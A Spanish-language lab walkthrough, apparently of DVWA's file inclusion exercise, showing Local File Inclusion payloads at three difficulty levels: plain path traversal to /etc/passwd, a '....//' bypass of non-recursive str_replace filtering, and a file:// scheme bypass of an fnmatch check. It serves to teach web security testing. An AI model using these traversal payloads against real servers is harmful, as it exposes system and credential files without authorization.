# LFI

## Bajo

Como dicho ataque consiste en poder cargar archivos locales, podemos ir a la url principal y buscar el robots.txt para las pruebas, si existe lo que tenemos que hacer es averiguar donde esta, esto lo hacemos entrando y saliendo de los directorios, por lo que si ponemos el siguiente codigo

```bash
../../robots.txt
```

Podemos observar que carga el fichero con los permisos para los robots.

<div style={{textAlign: 'center'}}>
    ![Ataque básico fichero robots](/img/attacks/file-inclusion/LFI/attack-basic-robots.png)
</div>

Ahora lo que tenemos que hacer es seguir buscando los diferentes niveles de carpetas hasta llegar a información interesante como el `/etc/passwd`

```bash
../../../../../etc/passwd
```

<div style={{textAlign: 'center'}}>
    ![Ataque básico fichero passwd](/img/attacks/file-inclusion/LFI/attack-basic-passwd.png)
</div>

## Medio

Cambiamos el nivel y si volvemos a probar la ruta de robots, vemos que esta vez no funciona

<div style={{textAlign: 'center'}}>
    ![Fallo ataque medio](/img/attacks/file-inclusion/LFI/attack-medium-fail.png)
</div>

Si nos fijamos en el código , vemos que hace una sustitución con `str_replace` no dejándonos usar el ../ para movernos por los directorios

```php
$file = str_replace( array( "../", "..\"" ), "", $file );
```

Pero como `str_replace` no es recursivo, podemos jugar con ello cambiando los el movimiento de carpetas por esto

```bash
....//
```

Lo que sucederá es que se eliminara el `../` dejando el que lo envuelve en su lugar, volviendo a funcionar el ataque.

<div style={{textAlign: 'center'}}>
    ![Ataque medio](/img/attacks/file-inclusion/LFI/attack-medium.png)
</div>

## Alto

Vamos con el ultimo nivel, volvemos a probar los ataques de antes

<div style={{textAlign: 'center'}}>
    ![Fallo ataque basico en nivel alto](/img/attacks/file-inclusion/LFI/attack-high-fail-basic.png)
</div>

<div style={{textAlign: 'center'}}>
    ![Fallo ataque medio en nivel alto](/img/attacks/file-inclusion/LFI/attack-high-fail-medium.png)
</div>

Y como vemos no nos funcionan ninguno de los dos, al fijarnos en el código

```php
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
```

vemos que usa la función fnmatch para comprobar si en la ruta existe la palabra file, por lo que podemos usar file:// que da acceso al sistema de ficheros local en php y contiene la palabra file

```bash
file:///var/www/html/robots.txt
```

<div style={{textAlign: 'center'}}>
    ![Ataque alto robots](/img/attacks/file-inclusion/LFI/attack-high-robots.png)
</div>

```bash
file:///etc/passwd
```

<div style={{textAlign: 'center'}}>
    ![Ataque alto passwd](/img/attacks/file-inclusion/LFI/attack-high-passwd.png)
</div>
